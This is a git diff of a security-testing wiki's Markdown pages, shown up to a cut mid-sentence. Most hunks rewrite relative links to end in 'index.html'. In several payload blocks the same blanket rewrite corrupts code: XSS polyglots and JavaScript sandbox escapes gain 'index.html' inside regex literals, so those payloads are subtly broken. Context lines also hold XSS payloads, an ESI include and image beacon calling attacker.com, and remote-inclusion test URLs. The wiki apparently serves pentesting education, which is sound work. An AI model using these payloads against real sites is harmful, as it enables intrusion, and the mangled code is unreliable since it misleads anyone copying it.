a/src/pentesting-web/browser-extension-pentesting-methodology/README.md b/src/pentesting-web/browser-extension-pentesting-methodology/README.md index 07cecd5c8..33a6452bd 100644 --- a/src/pentesting-web/browser-extension-pentesting-methodology/README.md +++ b/src/pentesting-web/browser-extension-pentesting-methodology/README.md @@ -698,7 +698,7 @@ Even though Browser Extensions have a **limited attack surface**, some of them m - [ ] **Limit** as much as possible the **`web_accessible_resources`**, even empty if possible. - [ ] If **`web_accessible_resources`** is not none, check for [**ClickJacking**](browext-clickjacking.md) - [ ] If any **communication** occurs from the **extension** to the **web page**, [**check for XSS**](browext-xss-example.md) **vulnerabilities** caused in the communication. - - [ ] If Post Messages are used, check for [**Post Message vulnerabilities**](../postmessage-vulnerabilities/)**.** + - [ ] If Post Messages are used, check for [**Post Message vulnerabilities**](../postmessage-vulnerabilities/index.html)**.** - [ ] If the **Content Script access DOM details**, check that they **aren't introducing a XSS** if they get **modified** by the web - [ ] Make a special emphasis if this communication is also involved in the **Content Script -> Background script communication** - [ ] If the background script is communicating via **native messaging** check the communication is secure and sanitized diff --git a/src/pentesting-web/client-side-template-injection-csti.md b/src/pentesting-web/client-side-template-injection-csti.md index b21b0bae1..448cb6fa0 100644 --- a/src/pentesting-web/client-side-template-injection-csti.md +++ b/src/pentesting-web/client-side-template-injection-csti.md @@ -4,7 +4,7 @@ ## Summary -It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/) but in the **client**. The **SSTI** can allow you to **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim's browser. +It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/index.html) but in the **client**. The **SSTI** can allow you to **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim's browser. **Testing** for this vulnerability is very **similar** as in the case of **SSTI**, the interpreter expects **a template** and will execute it. For example, with a payload like `{{ 7-7 }}`, if the app is **vulnerable** you will see a `0`, and if not, you will see the original: `{{ 7-7 }}` diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md index f395dfa98..c017f6de1 100644 --- a/src/pentesting-web/content-security-policy-csp-bypass/README.md +++ b/src/pentesting-web/content-security-policy-csp-bypass/README.md @@ -411,7 +411,7 @@ Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin. ### missing **base-uri** -If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection/). +If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection/index.html). Moreover, if the **page is loading a script using a relative path** (like ` -->'"/>
-">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> +">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/index.html) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> ``` @@ -108,7 +108,7 @@ $(ls) <br><b><h1>THIS IS AND INJECTED TITLE </h1> ``` -## [File Inclusion/Path Traversal](../file-inclusion/) +## [File Inclusion/Path Traversal](../file-inclusion/index.html) ### Basic Tests @@ -125,7 +125,7 @@ http://asdasdasdasd.burpcollab.com/mal.php \\asdasdasdasd.burpcollab.com/mal.php ``` -## [Open Redirect](../open-redirect.md) / [Server Side Request Forgery](../ssrf-server-side-request-forgery/) +## [Open Redirect](../open-redirect.md) / [Server Side Request Forgery](../ssrf-server-side-request-forgery/index.html) ### Basic Tests @@ -164,11 +164,11 @@ x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/C <!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>> ``` -## [Server Side Request Forgery](../ssrf-server-side-request-forgery/) +## [Server Side Request Forgery](../ssrf-server-side-request-forgery/index.html) The same tests used for Open Redirect can be used here. -## [Server Side Template Injection](../ssti-server-side-template-injection/) +## [Server Side Template Injection](../ssti-server-side-template-injection/index.html) ### Basic Tests @@ -218,7 +218,7 @@ javascript:alert() javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//> -->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``> jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e -">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> +">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/index.html) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* diff --git a/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md b/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md index bd44abc88..27dfa6332 100644 --- a/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md +++ b/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md @@ -37,7 +37,7 @@ javascript:alert(1) javascript:alert() javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//> -->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``> -">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> +">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/index.html) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> ``` diff --git a/src/pentesting-web/postmessage-vulnerabilities/README.md b/src/pentesting-web/postmessage-vulnerabilities/README.md index 80a1b317b..8573f06c8 100644 --- a/src/pentesting-web/postmessage-vulnerabilities/README.md +++ b/src/pentesting-web/postmessage-vulnerabilities/README.md @@ -226,8 +226,8 @@ Example of an exploit to abuse **Prototype Pollution and then XSS** through a `p For **more information**: -- Link to page about [**prototype pollution**](../deserialization/nodejs-proto-prototype-pollution/) -- Link to page about [**XSS**](../xss-cross-site-scripting/) +- Link to page about [**prototype pollution**](../deserialization/nodejs-proto-prototype-pollution/index.html) +- Link to page about [**XSS**](../xss-cross-site-scripting/index.html) - Link to page about [**client side prototype pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/index.html#client-side-prototype-pollution-to-xss) ## References diff --git a/src/pentesting-web/sql-injection/README.md b/src/pentesting-web/sql-injection/README.md index 804e05cf6..25a523188 100644 --- a/src/pentesting-web/sql-injection/README.md +++ b/src/pentesting-web/sql-injection/README.md @@ -269,7 +269,7 @@ a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DO ## Automated Exploitation -Check the [SQLMap Cheatsheet](sqlmap/) to exploit a SQLi vulnerability with [**sqlmap**](https://github.com/sqlmapproject/sqlmap). +Check the [SQLMap Cheatsheet](sqlmap/index.html) to exploit a SQLi vulnerability with [**sqlmap**](https://github.com/sqlmapproject/sqlmap). ## Tech specific info @@ -277,9 +277,9 @@ We have already discussed all the ways to exploit a SQL Injection vulnerability. - [MS Access](ms-access-sql-injection.md) - [MSSQL](mssql-injection.md) -- [MySQL](mysql-injection/) +- [MySQL](mysql-injection/index.html) - [Oracle](oracle-injection.md) -- [PostgreSQL](postgresql-injection/) +- [PostgreSQL](postgresql-injection/index.html) Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) diff --git a/src/pentesting-web/web-vulnerabilities-methodology.md b/src/pentesting-web/web-vulnerabilities-methodology.md index c33fd4452..855b0b2f1 100644 --- a/src/pentesting-web/web-vulnerabilities-methodology.md +++ b/src/pentesting-web/web-vulnerabilities-methodology.md @@ -11,7 +11,7 @@ In every Web Pentest, there are **several hidden and obvious places that might b > Nowadays **web** **applications** usually **uses** some kind of **intermediary** **proxies**, those may be (ab)used to exploit vulnerabilities. These vulnerabilities need a vulnerable proxy to be in place, but they usually also need some extra vulnerability in the backend. - [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md) -- [ ] [**Cache Poisoning/Cache Deception**](cache-deception/) +- [ ] [**Cache Poisoning/Cache Deception**](cache-deception/index.html) - [ ] [**HTTP Request Smuggling**](http-request-smuggling/) - [ ] [**H2C Smuggling**](h2c-smuggling.md) - [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md) @@ -32,18 +32,18 @@ If the introduced data may somehow be reflected in the response, the page might - [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md) - [ ] [**Command Injection**](command-injection.md) - [ ] [**CRLF**](crlf-0d-0a.md) -- [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection/) -- [ ] [**File Inclusion/Path Traversal**](file-inclusion/) +- [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection/index.html) +- [ ] [**File Inclusion/Path Traversal**](file-inclusion/index.html) - [ ] [**Open Redirect**](open-redirect.md) - [ ] [**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/index.html#client-side-prototype-pollution-to-xss) - [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md) -- [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery/) -- [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/) +- [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery/index.html) +- [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/index.html) - [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md) - [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-language-transformations.md) -- [ ] [**XSS**](xss-cross-site-scripting/) +- [ ] [**XSS**](xss-cross-site-scripting/index.html) - [ ] [**XSSI**](xssi-cross-site-script-inclusion.md) -- [ ] [**XS-Search**](xs-search/) +- [ ] [**XS-Search**](xs-search/index.html) Some of the mentioned vulnerabilities require special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in: @@ -55,11 +55,11 @@ pocs-and-polygloths-cheatsheet/ If the functionality may be used to search some kind of data inside the backend, maybe you can (ab)use it to search arbitrary data. -- [ ] [**File Inclusion/Path Traversal**](file-inclusion/) +- [ ] [**File Inclusion/Path Traversal**](file-inclusion/index.html) - [ ] [**NoSQL Injection**](nosql-injection.md) - [ ] [**LDAP Injection**](ldap-injection.md) - [ ] [**ReDoS**](regular-expression-denial-of-service-redos.md) -- [ ] [**SQL Injection**](sql-injection/) +- [ ] [**SQL Injection**](sql-injection/index.html) - [ ] [**XPATH Injection**](xpath-injection.md) ### **Forms, WebSockets and PostMsgs** @@ -68,15 +68,15 @@ When a websocket posts a message or a form allowing users to perform actions vul - [ ] [**Cross Site Request Forgery**](csrf-cross-site-request-forgery.md) - [ ] [**Cross-site WebSocket hijacking (CSWSH)**](websocket-attacks.md) -- [ ] [**PostMessage Vulnerabilities**](postmessage-vulnerabilities/) +- [ ] [**PostMessage Vulnerabilities**](postmessage-vulnerabilities/index.html) ### **HTTP Headers** Depending on the HTTP headers given by the web server some vulnerabilities might be present. - [ ] [**Clickjacking**](clickjacking.md) -- [ ] [**Content Security Policy bypass**](content-security-policy-csp-bypass/) -- [ ] [**Cookies Hacking**](hacking-with-cookies/) +- [ ] [**Content Security Policy bypass**](content-security-policy-csp-bypass/index.html) +- [ ] [**Cookies Hacking**](hacking-with-cookies/index.html) - [ ] [**CORS - Misconfigurations & Bypass**](cors-bypass.md) ### **Bypasses** @@ -86,7 +86,7 @@ There are several specific functionalities where some workarounds might be usefu - [ ] [**2FA/OTP Bypass**](2fa-bypass.md) - [ ] [**Bypass Payment Process**](bypass-payment-process.md) - [ ] [**Captcha Bypass**](captcha-bypass.md) -- [ ] [**Login Bypass**](login-bypass/) +- [ ] [**Login Bypass**](login-bypass/index.html) - [ ] [**Race Condition**](race-condition.md) - [ ] [**Rate Limit Bypass**](rate-limit-bypass.md) - [ ] [**Reset Forgotten Password Bypass**](reset-password.md) @@ -97,7 +97,7 @@ There are several specific functionalities where some workarounds might be usefu Some functionalities will require the **data to be structured in a very specific format** (like a language serialized object or XML). Therefore, it's easier to identify if the application might be vulnerable as it needs to be processing that kind of data.\ Some **specific functionalities** may be also vulnerable if a **specific format of the input is used** (like Email Header Injections). -- [ ] [**Deserialization**](deserialization/) +- [ ] [**Deserialization**](deserialization/index.html) - [ ] [**Email Header Injection**](email-injections.md) - [ ] [**JWT Vulnerabilities**](hacking-jwt-json-web-tokens.md) - [ ] [**XML External Entity**](xxe-xee-xml-external-entity.md) @@ -108,7 +108,7 @@ Functionalities that allow uploading files might be vulnerable to several issues Functionalities that generate files including user input might execute unexpected code.\ Users that open files uploaded by users or automatically generated including user input might be compromised. -- [ ] [**File Upload**](file-upload/) +- [ ] [**File Upload**](file-upload/index.html) - [ ] [**Formula Injection**](formula-csv-doc-latex-ghostscript-injection.md) - [ ] [**PDF Injection**](xss-cross-site-scripting/pdf-injection.md) - [ ] [**Server Side XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md) @@ -116,7 +116,7 @@ Users that open files uploaded by users or automatically generated including use ### **External Identity Management** - [ ] [**OAUTH to Account takeover**](oauth-to-account-takeover.md) -- [ ] [**SAML Attacks**](saml-attacks/) +- [ ] [**SAML Attacks**](saml-attacks/index.html) ### **Other Helpful Vulnerabilities** @@ -125,7 +125,7 @@ These vulnerabilities might help to exploit other vulnerabilities. - [ ] [**Domain/Subdomain takeover**](domain-subdomain-takeover.md) - [ ] [**IDOR**](idor.md) - [ ] [**Parameter Pollution**](parameter-pollution.md) -- [ ] [**Unicode Normalization vulnerability**](unicode-injection/) +- [ ] [**Unicode Normalization vulnerability**](unicode-injection/index.html) {{#include ../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/web-vulnerabilities-methodology/README.md b/src/pentesting-web/web-vulnerabilities-methodology/README.md index 56eb9dd44..e641a1c01 100644 --- a/src/pentesting-web/web-vulnerabilities-methodology/README.md +++ b/src/pentesting-web/web-vulnerabilities-methodology/README.md @@ -11,7 +11,7 @@ In every Web Pentest, there are **several hidden and obvious places that might b - [ ] [**Abusing hop-by-hop headers**](../abusing-hop-by-hop-headers.md) - [ ] [**Cache Poisoning/Cache Deception**](../cache-deception.md) -- [ ] [**HTTP Request Smuggling**](../http-request-smuggling/) +- [ ] [**HTTP Request Smuggling**](../http-request-smuggling/index.html) - [ ] [**H2C Smuggling**](../h2c-smuggling.md) - [ ] [**Server Side Inclusion/Edge Side Inclusion**](../server-side-inclusion-edge-side-inclusion-injection.md) - [ ] [**Uncovering Cloudflare**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md) @@ -31,16 +31,16 @@ If the introduced data may somehow be reflected in the response, the page might - [ ] [**Client Side Template Injection**](../client-side-template-injection-csti.md) - [ ] [**Command Injection**](../command-injection.md) - [ ] [**CRLF**](../crlf-0d-0a.md) -- [ ] [**Dangling Markup**](../dangling-markup-html-scriptless-injection/) -- [ ] [**File Inclusion/Path Traversal**](../file-inclusion/) +- [ ] [**Dangling Markup**](../dangling-markup-html-scriptless-injection/index.html) +- [ ] [**File Inclusion/Path Traversal**](../file-inclusion/index.html) - [ ] [**Open Redirect**](../open-redirect.md) - [ ] [**Prototype Pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/index.html#client-side-prototype-pollution-to-xss) - [ ] [**Server Side Inclusion/Edge Side Inclusion**](../server-side-inclusion-edge-side-inclusion-injection.md) -- [ ] [**Server Side Request Forgery**](../ssrf-server-side-request-forgery/) -- [ ] [**Server Side Template Injection**](../ssti-server-side-template-injection/) +- [ ] [**Server Side Request Forgery**](../ssrf-server-side-request-forgery/index.html) +- [ ] [**Server Side Template Injection**](../ssti-server-side-template-injection/index.html) - [ ] [**Reverse Tab Nabbing**](../reverse-tab-nabbing.md) - [ ] [**XSLT Server Side Injection**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md) -- [ ] [**XSS**](../xss-cross-site-scripting/) +- [ ] [**XSS**](../xss-cross-site-scripting/index.html) - [ ] [**XSSI**](../xssi-cross-site-script-inclusion.md) - [ ] [**XS-Search**](../xs-search.md) @@ -54,11 +54,11 @@ Some of the mentioned vulnerabilities require special conditions, others just re If the functionality may be used to search some kind of data inside the backend, maybe you can (ab)use it to search arbitrary data. -- [ ] [**File Inclusion/Path Traversal**](../file-inclusion/) +- [ ] [**File Inclusion/Path Traversal**](../file-inclusion/index.html) - [ ] [**NoSQL Injection**](../nosql-injection.md) - [ ] [**LDAP Injection**](../ldap-injection.md) - [ ] [**ReDoS**](../regular-expression-denial-of-service-redos.md) -- [ ] [**SQL Injection**](../sql-injection/) +- [ ] [**SQL Injection**](../sql-injection/index.html) - [ ] [**XPATH Injection**](../xpath-injection.md) ### **Forms, WebSockets and PostMsgs** @@ -67,15 +67,15 @@ When a websocket posts a message or a form allowing users to perform actions vul - [ ] [**Cross Site Request Forgery**](../csrf-cross-site-request-forgery.md) - [ ] [**Cross-site WebSocket hijacking (CSWSH)**](../websocket-attacks.md) -- [ ] [**PostMessage Vulnerabilities**](../postmessage-vulnerabilities/) +- [ ] [**PostMessage Vulnerabilities**](../postmessage-vulnerabilities/index.html) ### **HTTP Headers** Depending on the HTTP headers given by the web server some vulnerabilities might be present. - [ ] [**Clickjacking**](../clickjacking.md) -- [ ] [**Content Security Policy bypass**](../content-security-policy-csp-bypass/) -- [ ] [**Cookies Hacking**](../hacking-with-cookies/) +- [ ] [**Content Security Policy bypass**](../content-security-policy-csp-bypass/index.html) +- [ ] [**Cookies Hacking**](../hacking-with-cookies/index.html) - [ ] [**CORS - Misconfigurations & Bypass**](../cors-bypass.md) ### **Bypasses** @@ -85,7 +85,7 @@ There are several specific functionalities where some workarounds might be usefu - [ ] [**2FA/OTP Bypass**](../2fa-bypass.md) - [ ] [**Bypass Payment Process**](../bypass-payment-process.md) - [ ] [**Captcha Bypass**](../captcha-bypass.md) -- [ ] [**Login Bypass**](../login-bypass/) +- [ ] [**Login Bypass**](../login-bypass/index.html) - [ ] [**Race Condition**](../race-condition.md) - [ ] [**Rate Limit Bypass**](../rate-limit-bypass.md) - [ ] [**Reset Forgotten Password Bypass**](../reset-password.md) @@ -96,7 +96,7 @@ There are several specific functionalities where some workarounds might be usefu Some functionalities will require the **data to be structured in a very specific format** (like a language serialized object or XML). Therefore, it's easier to identify if the application might be vulnerable as it needs to be processing that kind of data.\ Some **specific functionalities** may be also vulnerable if a **specific format of the input is used** (like Email Header Injections). -- [ ] [**Deserialization**](../deserialization/) +- [ ] [**Deserialization**](../deserialization/index.html) - [ ] [**Email Header Injection**](../email-injections.md) - [ ] [**JWT Vulnerabilities**](../hacking-jwt-json-web-tokens.md) - [ ] [**XML External Entity**](../xxe-xee-xml-external-entity.md) @@ -107,7 +107,7 @@ Functionalities that allow uploading files might be vulnerable to several issues Functionalities that generate files including user input might execute unexpected code.\ Users that open files uploaded by users or automatically generated including user input might be compromised. -- [ ] [**File Upload**](../file-upload/) +- [ ] [**File Upload**](../file-upload/index.html) - [ ] [**Formula Injection**](../formula-csv-doc-latex-ghostscript-injection.md) - [ ] [**PDF Injection**](../xss-cross-site-scripting/pdf-injection.md) - [ ] [**Server Side XSS**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md) @@ -115,7 +115,7 @@ Users that open files uploaded by users or automatically generated including use ### **External Identity Management** - [ ] [**OAUTH to Account takeover**](../oauth-to-account-takeover.md) -- [ ] [**SAML Attacks**](../saml-attacks/) +- [ ] [**SAML Attacks**](../saml-attacks/index.html) ### **Other Helpful Vulnerabilities** @@ -124,7 +124,7 @@ These vulnerabilities might help to exploit other vulnerabilities. - [ ] [**Domain/Subdomain takeover**](../domain-subdomain-takeover.md) - [ ] [**IDOR**](../idor.md) - [ ] [**Parameter Pollution**](../parameter-pollution.md) -- [ ] [**Unicode Normalization vulnerability**](../unicode-injection/) +- [ ] [**Unicode Normalization vulnerability**](../unicode-injection/index.html) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/xss-cross-site-scripting/README.md b/src/pentesting-web/xss-cross-site-scripting/README.md index 4cbaab7bb..1e15ea419 100644 --- a/src/pentesting-web/xss-cross-site-scripting/README.md +++ b/src/pentesting-web/xss-cross-site-scripting/README.md @@ -11,7 +11,7 @@ 2. Can you use events or attributes supporting `javascript:` protocol? 3. Can you bypass protections? 4. Is the HTML content being interpreted by any client side JS engine (_AngularJS_, _VueJS_, _Mavo_...), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md). - 5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/)? + 5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/index.html)? 2. Inside a **HTML tag**: 1. Can you exit to raw HTML context? 2. Can you create new events/attributes to execute JS code? @@ -257,7 +257,7 @@ If in order to exploit the vulnerability you need the **user to click a link or ### Impossible - Dangling Markup -If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection/)because you could **exploit** the vulnerability **without** executing **JS** code. +If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection/index.html)because you could **exploit** the vulnerability **without** executing **JS** code. ## Injecting inside HTML tag @@ -1056,7 +1056,7 @@ eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequir // use of with with(console)log(123) -with(/console.log(1)/)with(this)with(constructor)constructor(source)() +with(/console.log(1)/index.html)with(this)with(constructor)constructor(source)() // Just replace console.log(1) to the real code, the code we want to run is: //return String(process.mainModule.require('fs').readFileSync('flag.txt')) diff --git a/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md b/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md index 02dc7d2a8..90a45448b 100644 --- a/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md +++ b/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md @@ -159,7 +159,7 @@ for(let i=0; i<1000; i++) { <img src="https://attacker.com/startingScan"> ``` -### [SSRF](../ssrf-server-side-request-forgery/) +### [SSRF](../ssrf-server-side-request-forgery/index.html) This vulnerability can be transformed very easily in a SSRF (as you can make the script load external resources). So just try to exploit it (read some metadata?). diff --git a/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md b/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md index 025758a35..31f300c1a 100644 --- a/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md +++ b/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md @@ -70,7 +70,7 @@ Payloads example: <div id="1 -![](contenteditable/autofocus/onfocus=confirm('qwq')//)"> +![](contenteditable/autofocus/onfocus=confirm('qwq')//index.html)"> ----------------------------------------------- <a title="a diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md index 850bafe24..ee3b7ae33 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md @@ -9,7 +9,7 @@ The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel ter ## Bypasses - It's possible to use techniques such as [**ROP**](../stack-overflow/rop-return-oriented-programing.md) to bypass this protection by executing chunks of executable code already present in the binary. - - [**Ret2libc**](../stack-overflow/ret2lib/) + - [**Ret2libc**](../stack-overflow/ret2lib/index.html) - [**Ret2syscall**](../stack-overflow/rop-syscall-execv.md) - **Ret2...** diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md index e2ae64f4e..2c33a15e7 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md @@ -23,7 +23,7 @@ In order to bypass PIE it's needed to **leak some address of the loaded** binary bypassing-canary-and-pie.md {{#endref}} -- Use an arbitrary read vulnerability such as [**format string**](../../format-strings/) to leak an address of the binary (e.g. from the stack, like in the previous technique) to get the base of the binary and use offsets from there. [**Find an example here**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass). +- Use an arbitrary read vulnerability such as [**format string**](../../format-strings/index.html) to leak an address of the binary (e.g. from the stack, like in the previous technique) to get the base of the binary and use offsets from there. [**Find an example here**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass). ## References diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md index b32c98ca6..aa0ba207e 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md @@ -62,7 +62,7 @@ However, in other scenarios maybe just **overwriting some variables values in th ### Ret2win -In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called: +In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) would be disabled) so when the vulnerable function returns, the hidden function will be called: {{#ref}} ret2win.md diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md index b7cffb228..c634d743b 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md @@ -77,7 +77,7 @@ print(p.recvline()) # should receive "Awesome work!" ### Why Not Just Use libc Directly? -Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**. +Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/index.html), but sometimes you need to control more parameters than are easily 